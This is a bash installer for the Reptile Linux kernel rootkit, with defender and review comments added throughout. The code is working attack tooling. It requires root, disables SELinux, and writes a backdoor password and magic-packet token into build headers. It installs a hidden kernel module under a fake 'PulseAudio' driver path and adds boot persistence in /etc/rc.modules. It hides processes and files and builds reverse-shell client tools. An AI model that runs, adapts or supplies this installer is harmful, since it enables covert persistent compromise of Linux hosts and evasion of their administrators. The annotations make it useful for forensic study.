#!/bin/bash
#
# Reptile Install Script
# Author: F0rb1dd3n

# Script-wide settings.
# DRIVER is the directory name used under /lib/modules/<kernel>/kernel/drivers/
# when DRIVER_DIRECTORY is built later in this file.
DRIVER="PulseAudio"
# Running kernel release; selects which /lib/modules/<release>/ tree is written to.
KERNEL_VERSION=$(uname -r)
# NOTE(review): this assigns the shell's own PWD variable to a fixed staging path
# instead of reading the real working directory. directory_remove later passes
# this value to `rm -rf`. The hard-coded path is specific to this copy of the script.
PWD="/tmp/tmp/Reptile-master/"

# Print the four-line coloured installer banner to stdout.
# Takes no arguments; the strings are passed to `echo -e` so the ANSI colour
# escapes and embedded newlines are interpreted.
function banner {
	local line
	for line in \
		"\n\e[00;31m############################################################################\e[00m" \
		"\e[00;31m############################ \e[01;36mREPTILE INSTALLER\e[00;31m #############################\e[00m" \
		"\e[00;31m############################################################################\e[00m" \
		"\e[00;36mwritten by: F0rb1dd3n\e[00m\n"
	do
		echo -e "$line"
	done
}

# Print the banner followed by the list of sub-commands accepted as $1.
# $0 is expanded into the usage line exactly as the script was invoked.
function usage {
	banner
	local row
	for row in \
		"Usage: $0 <arg>\n" \
		"\tinstall\t\tCompile and install the module persistently" \
		"\tremove\t\tRemove the persistence of module" \
		"\tclient\t\tConfigure and compile remote client" \
		"\treverse\t\tBuild a standalone version of reptile shell\n"
	do
		echo -e "$row"
	done
}

# Ask the operator whether to delete the staging directory named by $PWD and
# act on the answer. $PWD is the fixed path assigned at the top of this script.
# Forensic note: answering Y removes the source tree, so a missing staging
# directory does not show that the installer never ran.
function directory_remove {
	# read is given no variable name, so the answer is stored in $REPLY.
	read -p "Would you like to remove this directory ($PWD) on exit? (Y/N) [default: N]: "
	if [ "$REPLY" == "Y" ] || [ "$REPLY" == "y" ]; then
        echo -n "Removing $PWD... "
        # NOTE(review): $PWD is expanded unquoted in a recursive delete.
        rm -rf $PWD && echo -e "\e[01;36mDONE!\e[00m" || echo -e "\e[01;31mERROR!\e[00m"
	# An empty reply is treated the same as N (the advertised default).
	elif [ "$REPLY" == "N" ] || [ "$REPLY" == "n" ] || [ -z $REPLY ]; then
        echo -e "Not removing $PWD"
	else
        echo -e "Invalid option. Not removing $PWD"
	fi
}

# Pre-install checks and host preparation.
# Exits unless the host is Linux, the caller is uid 0 and /proc exists.
# If SELinux is configured as enforcing, it lowers the running mode and edits
# the persistent configuration. Sets the global SYSTEM.
#
# Defender note: the SELinux steps below change host state before any module is
# built. An unexpected switch to permissive mode, or /etc/selinux/config changing
# from SELINUX=enforcing to SELINUX=disabled, is an artifact of this function.
function reptile_init {
	banner

	[ $(uname) != "Linux" ] && {
		echo "Not on a Linux system. Exiting..."
		exit
	}

	[ $(id -u) != 0 ] && {
		echo "Not root. Exiting..."
		exit
	}

	if [ -f /etc/selinux/config ]; then
        	echo -ne "SELinux config found on system!\nChecking SELinux status... "
        	# Only the last line containing "SELINUX=" in the config file is tested.
        	if [[ $(cat /etc/selinux/config | grep "SELINUX=" | tail -n 1) == *"enforcing"* ]]; then
                	echo -ne "\e[01;31menforcing\e[00m\n"
                	echo -n "Trying to set enforce permissive... "
                	# Runtime change: switches the running system to permissive mode.
                	setenforce 0
                	if [ "$(getenforce)" == "Permissive" ]; then
                    	echo -e "\e[01;36mDONE!\e[00m"
                	else
                    	echo -e "\e[01;31mERROR!\e[00m"
                	fi
                	echo -n "Trying to disable SELinux... "
                	# Persistent change: rewrites the config file in place.
                	sed -i "s:SELINUX=enforcing:SELINUX=disabled:" /etc/selinux/config || {
                        echo -e "\e[01;31mERROR!\e[00m\n"
                        #exit
                	}
                	# The exit above is commented out, so DONE! is printed even when sed failed.
                	echo -e "\e[01;36mDONE!\e[00m"
                	echo -e "\e[01;33mMaybe you will need to reboot!\e[00m\n"
        	else
                	echo -e "\e[01;36mclear\e[00m\n"
        	fi
	fi      

	[ ! -e /proc ] && {
        echo -e "We're in a horrible jail as /proc doesn't exist. Exiting...\n"
        exit
	}

    # Derives a distro name from the /etc/*release or /etc/*version file name,
    # skipping os-release and lsb-release. The substring starts at offset 5,
    # which is just past "/etc/", and its length is the path length minus 13.
    for f in $(find /etc -type f -maxdepth 1 \( ! -wholename /etc/os-release ! -wholename /etc/lsb-release -wholename /etc/\*release -o -wholename /etc/\*version \) 2> /dev/null)
    do 
    	SYSTEM=${f:5:${#f}-13}
    done

    # The detected value is overwritten unconditionally, so in this copy of the
    # script SYSTEM is always "redhat" and the empty check below cannot fire.
    # reptile_install therefore always takes its /etc/rc.modules branch.
    SYSTEM="redhat"
    if [ "$SYSTEM" == "" ]; then
    	exit
    fi

	#perl -MCPAN -e "install String::Unescape"# > /dev/null 2>&1
}

# Prompt for the per-build settings and generate scripts/start, config.h and
# sbin/config.h from them.
# Globals written: MODULE, DRIVER_DIRECTORY, TOKEN, PASS, TAG, SRCPORT, RSH,
#   _SHELL, CMD, START, TAGIN, TAGOUT, AUTH, HTUA, HOMEDIR, RCFILE.
# Globals read: KERNEL_VERSION, DRIVER; LHOST, LPORT and INTERVAL are read but
#   never assigned in this file.
#
# Defender note: every on-disk name is derived from the operator-chosen MODULE
# value, so there is no fixed file name to search for. What stays constant in
# this copy is the "PulseAudio" directory under kernel/drivers/, the
# /<name>/<name>_{reverse,cmd,start,rc} layout, the "ata/0" string and the
# AUTH/HTUA/EXIT constants below.
function config_gen {
	# All answers are read with plain `read` (no -r, no -s), so the token and
	# password are typed in clear text and echoed back further down.
	echo "Hide name (will be used to hide dirs/files)"
    read var
	MODULE=$var
	# Destination for the kernel module inside the running kernel's module tree.
	DRIVER_DIRECTORY="/lib/modules/$KERNEL_VERSION/kernel/drivers/$DRIVER/$MODULE"

	echo "Auth token to magic packets"
    read var
	TOKEN=$var

	echo "Backdoor password"
    read var
	PASS=$var

	echo "Tag name that hide file contents"
    read var
	TAG=$var

	echo "Source port of magic packets"
    read var
	SRCPORT=$var

	# RSH is hard-coded to "n", so both reverse-shell branches below are dead
	# code in this copy of the script.
	RSH="n"

	echo -e "\nToken: \e[01;36m$TOKEN\e[00m"
	echo -e "Backdoor password: \e[01;36m$PASS\e[00m"
	echo -e "SRC port: \e[01;36m$SRCPORT\e[00m"

	if [ "$RSH" == "y" ] || [ "$RSH" == "Y" ]; then
		echo -e "\nReverse shell each X time:"
		echo -e "Reverse IP: \e[01;36m$LHOST\e[00m"
		echo -e "Reverse Port: \e[01;36m$LPORT\e[00m"
		echo -e "Interval: \e[01;36m$INTERVAL\e[00m"
	fi

	echo -e "\nTAGs to hide file contents: \n\n\e[01;36m#<$TAG>\n\e[00mcontent to be hidden\n\e[01;36m#</$TAG>\e[00m\n"

	echo -ne "Configuring... "
	
	if [ ! -d $DRIVER_DIRECTORY ]; then
        mkdir -p $DRIVER_DIRECTORY
    fi

	# Paths of the helper binaries as they will exist after reptile_install
	# copies them into a directory named /$MODULE at the filesystem root.
	_SHELL="/"$MODULE"/"$MODULE"_reverse"
	CMD="/"$MODULE"/"$MODULE"_cmd"
	
	# scripts/start is built in three pieces. Its body is wrapped in the
	# #<TAG> ... #</TAG> markers that the prompt above describes as hiding
	# file contents.
	cat > scripts/start <<EOF
#!/bin/bash
#<$TAG>
EOF

	if [ "$RSH" == "y" ] || [ "$RSH" == "Y" ]; then
		cat >> scripts/start <<EOF	
$_SHELL -t $LHOST -p $LPORT -s $PASS -r $INTERVAL
EOF
	fi

	# The generated script calls the _cmd helper with `hide` on the PIDs whose
	# `ps -ef` line contains "ata/0", then calls it with `file-tampering`.
	# The backticks and \$2 are escaped so they are evaluated when the start
	# script runs, not while this heredoc is written.
	cat >> scripts/start <<EOF
$CMD hide \`ps -ef | grep "ata/0" | grep -v grep | awk '{print \$2}'\`
$CMD file-tampering
#</$TAG>
EOF
	chmod +x scripts/start
	
	START="/"$MODULE"/"$MODULE"_start"
	TAGIN="#<$TAG>"
	TAGOUT="#</$TAG>"
	# Fixed 32-bit constants written into both generated headers. They are the
	# same for every build made with this copy of the script.
	AUTH=0x3b7567cb
	HTUA=0x87236fc7

	# Header for the kernel module build. The quoted values come from the
	# prompts above and are inserted without any escaping.
	cat > config.script <<EOF
#ifndef _CONFIG_H
#define _CONFIG_H

#define TOKEN 		"$TOKEN"
#define PASS 		"$PASS"
#define SHELL 		"$_SHELL"
#define START 		"$START"
#define HIDE 		"$MODULE"
#define HIDETAGIN 	"$TAGIN"
#define HIDETAGOUT 	"$TAGOUT"
#define PATH        "PATH=/sbin:/bin:/usr/sbin:/usr/bin"
#define WORKQUEUE	"ata/0"
#define SRCPORT 	$SRCPORT
#define AUTH		$AUTH
#define HTUA		$HTUA

#endif
EOF

	# The header is piped through scripts/destringify.pl, which is not shown
	# here. NOTE(review): presumably it rewrites the string literals so they do
	# not appear verbatim in the compiled output; confirm against that script
	# before relying on these strings as static signatures.
	cat config.script | perl scripts/destringify.pl > config.h
	#cat config.script > config.h
	rm -rf config.script

	HOMEDIR="/root"
	RCFILE="/"$MODULE"/"$MODULE"_rc"

	# Header for the userland tools built under sbin/. The EXIT string and the
	# numeric command codes are fixed values.
	cat > sbin/config.script <<EOF
#ifndef _CONFIG_H
#define _CONFIG_H

#define HOMEDIR		"$HOMEDIR"
#define RCFILE 		"$RCFILE"
#define GET_FILE 	1
#define PUT_FILE 	2
#define RUNSHELL 	3
#define SET_DELAY 	4
#define OUT 		5
#define EXIT_LEN 	16
#define EXIT 		";7(Zu9YTsA7qQ#vw"
#define AUTH		$AUTH
#define HTUA		$HTUA

#endif
EOF

	cat sbin/config.script | perl scripts/destringify.pl > sbin/config.h
	#cat sbin/config.script > sbin/config.h
	rm -rf sbin/config.script

	echo -e "\e[01;36mDONE!\e[00m"
}

# Full install path: run the host checks, generate the configuration, build,
# copy the artifacts into place, register boot persistence and load the module.
# Any failing stage prints ERROR! and exits the script.
#
# Artifacts this function leaves on the host, all visible in the code below:
#   - a directory /$MODULE at the filesystem root holding $MODULE.ko and
#     ${MODULE}_reverse, ${MODULE}_cmd, ${MODULE}_start, ${MODULE}_rc, all mode 777
#   - $MODULE.ko copied under /lib/modules/<kernel>/kernel/drivers/PulseAudio/$MODULE
#   - a block delimited by #<TAG> / #</TAG> appended to /etc/modules or
#     /etc/rc.modules; /etc/rc.modules is also made executable
#   - a depmod run and an on-host gcc build of loader.c, both executed as root
function reptile_install {
	reptile_init
	config_gen

	# Build output is discarded, so a failed build shows only ERROR!.
	# The built module bin/reptile is renamed to bin/$MODULE.ko.
	echo -ne "Compiling... "
	make all > /dev/null 2>&1 && \
	make clean > /dev/null 2>&1 && \
	mv bin/reptile bin/$MODULE.ko > /dev/null 2>&1 && \
	echo -e "\e[01;36mDONE!\e[00m" || { echo -e "\e[01;31mERROR!\e[00m\n"; exit; }

	# Stages the module and helper files in /$MODULE, makes everything there
	# world-writable and executable, then deletes the local bin/ directory and
	# the generated scripts/start.
	echo -ne "Copying files to \e[01;32m/$MODULE\e[00m... "
	mkdir -p /$MODULE 2> /dev/null && \
	cp bin/$MODULE* /$MODULE 2> /dev/null && \
	cp bin/reverse /$MODULE/$MODULE"_reverse" 2> /dev/null && \
	cp bin/cmd /$MODULE/$MODULE"_cmd" 2> /dev/null && \
	cp scripts/start /$MODULE/$MODULE"_start" 2> /dev/null && \
	cp scripts/bashrc /$MODULE/$MODULE"_rc" 2> /dev/null && \
	chmod 777 /$MODULE/* && \
	rm -rf bin 2> /dev/null && \
	rm -f scripts/start 2> /dev/null && \
	echo -e "\e[01;36mDONE!\e[00m" || { echo -e "\e[01;31mERROR!\e[00m\n"; exit; }

	echo -ne "Installing... "

	cp "/$MODULE/$MODULE.ko" "$DRIVER_DIRECTORY" 2> /dev/null || { echo -e "\e[01;31mERROR!\e[00m\n"; exit; }

    # Boot persistence. reptile_init sets SYSTEM to "redhat" unconditionally,
    # so in this copy only the /etc/rc.modules branch is reachable. The entry
    # is appended with >> and wrapped in the #<TAG> ... #</TAG> markers.
    if [ "$SYSTEM" == "debian" ] || [ "$SYSTEM" == "ubuntu" ]; then
    	echo -ne "#<$TAG>\n$MODULE\n#</$TAG>" >> /etc/modules || { echo -e "\e[01;31mERROR!\e[00m\n"; exit; }
    elif [ "$SYSTEM" == "redhat" ] || [ "$SYSTEM" == "centos" ] || [ "$SYSTEM" == "fedora" ]; then
    	echo -ne "#<$TAG>\nmodprobe $MODULE\n#</$TAG>" >> /etc/rc.modules && \
		chmod +x /etc/rc.modules || { echo -e "\e[01;31mERROR!\e[00m\n"; exit; }
	#elif [ "$SYSTEM" == "arch" ]; then
    #	echo -ne "#<$TAG>\n$MODULE\n#</$TAG>" >> /etc/modules || { echo -e "\e[01;31mERROR!\e[00m\n"; exit; }
    fi

	# loader.c is compiled on the host and its exit status is not checked.
	# The resulting ./loader is run on the .ko in place of the commented-out
	# insmod call. The loader binary is deleted only when this chain succeeds,
	# because the failure path exits first.
	gcc loader.c -o loader
	depmod && \
	#insmod /$MODULE/$MODULE.ko > /dev/null 2>&1 
	./loader /$MODULE/$MODULE.ko && \
	echo -e "\e[01;36mDONE!\e[00m\n" || { echo -e "\e[01;31mERROR!\e[00m\n"; exit; }
	rm -f loader

	directory_remove
	echo -e "\nInstalation has finished!\n"
}

# Uninstall path: ask for the hide name used at install time, remove the
# persistence files, the /$MODULE directory and the driver directory, then
# offer a reboot.
#
# Incident-response note: this routine deletes /etc/rc.modules and /etc/modules
# outright instead of removing only the tagged block the installer appended.
# Legitimate module entries in those files are lost with it, so restore them
# from a known-good source rather than assuming they were untouched.
function reptile_remove {
	banner

	echo "Hide name"
    read var
	MODULE=$var
	DRIVER_DIRECTORY="/lib/modules/$KERNEL_VERSION/kernel/drivers/$DRIVER/$MODULE"
	
	# The only installed-state check is whether the /$MODULE directory exists.
	if [ ! -d "/$MODULE" ]; then
	    echo -e "Reptile seems to be uninstalled!\n"	
	    exit
	fi

	echo -e "\n\e[01;31mPussy!\e[00m"
	echo -ne "Uninstalling... "

	# Whole-file deletion of both persistence targets, whichever one was used.
	rm -rf /etc/rc.modules
	rm -rf /etc/modules
	depmod

	# When lsmod lists no line matching "reptile", the _cmd helper is called
	# with `show`. NOTE(review): presumably this undoes the hiding applied by
	# the start script; confirm against the cmd source, which is not shown here.
	if [ -z $(lsmod | grep reptile | cut -d " " -f 1) ]; then
		/$MODULE/$MODULE"_cmd" show > /dev/null 2>&1 || { echo -e "\e[01;31mERROR!\e[00m\n"; exit; }
	fi

	# NOTE(review): both paths are built from the typed name and expanded
	# unquoted; an empty answer would already have exited above only if "/"
	# were not a directory, so the name is not validated before these deletes.
	rm -rf /$MODULE && \
	rm -rf $DRIVER_DIRECTORY && \
	echo -e "\e[01;36mDONE!\e[00m\n" || { echo -e "\e[01;31mERROR!\e[00m\n"; exit; }

	directory_remove
	echo

	# No rmmod is issued anywhere in this function; the prompt states that a
	# reboot is needed to complete the uninstallation.
	read -p "To complete this uninstallation is needed to reboot (Y/N) [default: N]: "
	if [ "$REPLY" == "Y" ] || [ "$REPLY" == "y" ]; then
        echo -e "Rebooting... "
        reboot
	elif [ "$REPLY" == "N" ] || [ "$REPLY" == "n" ] || [ -z $REPLY ]; then
        echo -e "Not rebooting the system!"
	else
        echo -e "Invalid option. Not rebooting the system!"
	fi
	echo
}

# Build the operator-side tools (make targets listener, packet and client under
# sbin/) and report that the output is in bin/.
# Writes sbin/config.h with only the fixed command codes and the EXIT string.
# Unlike config_gen and reverse_build, the header is copied verbatim and is not
# passed through scripts/destringify.pl.
function client_build {
	banner

	echo -ne "\nConfiguring... "

	cat > sbin/config.script <<EOF
#ifndef _CONFIG_H
#define _CONFIG_H

#define GET_FILE 	1
#define PUT_FILE 	2
#define RUNSHELL 	3
#define SET_DELAY 	4
#define OUT 		5
#define EXIT_LEN 	16
#define EXIT 		";7(Zu9YTsA7qQ#vw"

#endif
EOF

	#cat sbin/config.script | perl scripts/destringify.pl > sbin/config.h
	cat sbin/config.script > sbin/config.h
	rm -rf sbin/config.script
	echo -e "\e[01;36mDONE!\e[00m"

	# Build output is discarded; a failure in any step prints ERROR! and exits.
	echo -ne "Compiling... "
	mkdir -p bin && \
	cd sbin && \
	make listener > /dev/null 2>&1 && \
	make packet > /dev/null 2>&1 && \
	make client > /dev/null 2>&1 && \
	make clean > /dev/null 2>&1 && \
	cd .. && \
	echo -e "\e[01;36mDONE!\e[00m" || { echo -e "\e[01;31mERROR!\e[00m\n"; exit; }
	echo -e "\nYour client is at \e[01;32mbin/\e[00m\n"
}

# Build the standalone variant of the shell component (make target
# standalone_reverse under sbin/) and report that the output is in bin/.
# The generated header uses fixed values rather than prompted ones: HOMEDIR is
# "/root" and RCFILE is "/var/tmp/.bashrc". The RCFILE path is a fixed file
# system location specific to builds made by this function.
function reverse_build {
	banner

	echo -ne "\nConfiguring... "

	cat > sbin/config.script <<EOF
#ifndef _CONFIG_H
#define _CONFIG_H

#define HOMEDIR		"/root"
#define RCFILE 		"/var/tmp/.bashrc"
#define GET_FILE 	1
#define PUT_FILE 	2
#define RUNSHELL 	3
#define SET_DELAY 	4
#define OUT 		5
#define EXIT_LEN 	16
#define EXIT 		";7(Zu9YTsA7qQ#vw"

#endif
EOF

	# The header goes through scripts/destringify.pl, which is not shown here.
	# NOTE(review): its effect on the string literals should be confirmed
	# before treating the values above as strings present in the binary.
	cat sbin/config.script | perl scripts/destringify.pl > sbin/config.h
	#cat sbin/config.script > sbin/config.h
	rm -rf sbin/config.script
	echo -e "\e[01;36mDONE!\e[00m"

	# Build output is discarded; a failure in any step prints ERROR! and exits.
	echo -ne "Compiling... "
	mkdir -p bin && \
	cd sbin && \
	make standalone_reverse > /dev/null 2>&1 && \
	make clean > /dev/null 2>&1 && \
	cd .. && \
	echo -e "\e[01;36mDONE!\e[00m" || { echo -e "\e[01;31mERROR!\e[00m\n"; exit; }
	echo -e "\nYour reverse shell is at \e[01;32mbin/\e[00m\n"
}

# Entry point: dispatch on the first command-line argument.
# Only an empty argument prints the usage text. There is no default arm, so any
# other unrecognised value falls through and the script exits without output.
case $1 in
    install)
    	reptile_install
    	;;
    remove)
    	reptile_remove
    	;;
	client)
		client_build
		;;
	reverse)
		reverse_build
		;;
	"")
		usage
		;;
esac